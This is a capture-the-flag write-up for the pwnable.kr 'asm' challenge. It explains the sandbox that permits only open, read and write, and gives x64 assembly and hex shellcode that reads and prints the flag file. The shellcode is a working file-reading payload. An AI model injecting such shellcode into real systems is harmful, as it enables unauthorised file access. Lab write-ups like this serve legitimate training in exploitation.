# 18 - asm

## The Challenge

Mommy! I think I know how to make shellcodes

ssh <asm@pwnable.kr> -p2222 (pw: guest)

## The Solution

The challenge directory contains a readme:

> once you connect to port 9026, the "asm" binary will be executed under asm\_pwn privilege. make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)

The directory really contains a file with an awefully long name.

It's time to run the binary:

![The last line and a half is my input, don't get confused :)](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIjzjryI-NJ0MhBEmsy%2F-MIroJChVAf86Cx4jSq-%2Fimage.png?alt=media\&token=e1548f7a-fa1a-422e-843f-63939436aacf)

Our input should be x64 shellcode that uses only `open, read` and `write` to print the flag. A peek at the source code shows there aren't any shenanigans, it's really what we need to do.

The source also contains shell code which our shell code gets concatinated to. Lets [decode](https://defuse.ca/online-x86-assembler.htm#disassembly2) it:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIjzjryI-NJ0MhBEmsy%2F-MIrqJOInVmPc6lfX93y%2Fimage.png?alt=media\&token=4ee3964b-0701-4f3a-878b-a95eddf8bbbd)

It zeros the registers. That's actualy quite nice of pwnables side, thanks ^\_^

It's time to write some pure assembly! Using [this](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md) wonderful table we created assembly that opens the flag file, reads it and outputs to stdout.

```
mov rax, 2
mov rdi, 0x4141406f
syscall
mov rdi, rax
mov rax, 0
mov rsi, 0x4141406f
mov rdx, 0x30
syscall
mov rax, 1
mov rdi, 1
syscall

# shellcode: \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05
```

You may be asking yourself "what's that address that is assigned to rsi and rdi?" We concatinate the flag file name to the end of the shellcode, and that's it's addess. We also read the flag to the same location. The final shellcode:

```
\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05\x25\x00\x00\x00\x00\x0F\x05\x74\x68\x69\x73\x5f\x69\x73\x5f\x70\x77\x6e\x61\x62\x6c\x65\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x65\x61\x73\x65\x5f\x72\x65\x61\x64\x5f\x74\x68\x69\x73\x5f\x66\x69\x6c\x65\x2e\x73\x6f\x72\x72\x79\x5f\x74\x68\x65\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x73\x5f\x76\x65\x72\x79\x5f\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x00
```